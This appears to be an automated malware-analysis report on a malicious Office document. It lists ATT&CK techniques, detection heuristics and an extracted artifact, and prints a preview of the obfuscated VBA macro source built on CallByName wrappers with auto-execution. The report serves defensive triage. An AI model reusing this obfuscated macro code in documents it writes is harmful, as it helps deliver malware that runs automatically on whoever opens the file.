MALICIOUS
144
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The heuristics indicate the use of `CallByName` and auto-execution via `Document_Open`, suggesting the macros are intended to run automatically upon opening the document. The primary function of the VBA code appears to be executing arbitrary code, likely to download and execute a second-stage payload, which is a common technique for malware delivery.
Heuristics 6
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Dim rREkCLEslL As Integer, kTRGfWEy As Integer bLAdy = CallByName(lUYWi, eSriMosOMv, 2) End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1798 bytes |
SHA-256: 007a961b52665b2e92afa3a072389d065fa465248f1773353f4f51fff467383e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
30 of 51 identifiers look randomly generated (e.g. 'omMzZqb7jBGRIm8rYY64nD') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SLuAKL" Public Function bLAdy(ByVal lUYWi As Object, ByVal zTHYXlxIIc As String, ByVal eSriMosOMv As String, ByVal GoeYPp As Integer) As Variant Dim rREkCLEslL As Integer, kTRGfWEy As Integer bLAdy = CallByName(lUYWi, eSriMosOMv, 2) End Function Public Sub KmPiI(ByVal koqwxGJSWQ As String, ByVal UJuGPYCIKi As Variant, ByVal SMYXA As Variant, ByVal jksxaskKaJ As Object) Dim qvgRk As String CallByName jksxaskKaJ, koqwxGJSWQ, 1, SMYXA, UJuGPYCIKi End Sub Private Function VAqvWwwLxt() As Boolean HTXti "7zKOizXIOKAhVH8xgvR" VAqvWwwLxt = False End Function Public Function potTOQj(ByVal jwvIKIdPs As String, ByVal uauCLzYxFy As String, ByVal FpBCmZuUb As Object) As Variant Dim DGcUz As Boolean Dim PKzVZ As Boolean Set potTOQj = CallByName(FpBCmZuUb, uauCLzYxFy, 2, jwvIKIdPs) End Function Public Sub gfDVb(ByVal UNBmlkKNLR As Boolean, ByVal WfGlH As String, ByVal LypEislIBy As Object, ByVal aHKBLYxD As Variant) Dim vMxvWF As Integer Dim tkQllzvu As Integer CallByName LypEislIBy, WfGlH, 1, aHKBLYxD End Sub Private Sub vEVzXyMgw(ByVal TBHnt As Boolean) NvOKlpusE aVtapbVnl "cUEKLYNV7x2u4UynNk", 1093, 9096 End Sub Private Function rmSqsdMswX() As Integer nCnktKv False hCCQENhD 3748, 2598, "omMzZqb7jBGRIm8rYY64nD" CGgZkEaFBc rmSqsdMswX = 1258 End Function Public Sub ulAUPana(ByVal CcKZRdW As Integer, ByVal ruwXYoeAf As String, ByVal pcdOb As Variant, ByVal vnMneN As String, ByVal BajQck As Object) CallByName BajQck, ruwXYoeAf, 4, pcdOb End Sub Private Function gnUywC(ByVal RjGyl As String) As Boolean gOZso 1884 gnUywC = True End Function Public Sub ZkQWC(ByVal DHCii As Object, ByVal nsfPXkp As String) Dim GyXmbTidT As Integer Dim rPPrnI As Integer kayWGvM = "TvnR0hDuvbs0I7B48b5" CallByName DHCii, nsfPXkp, 1 End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.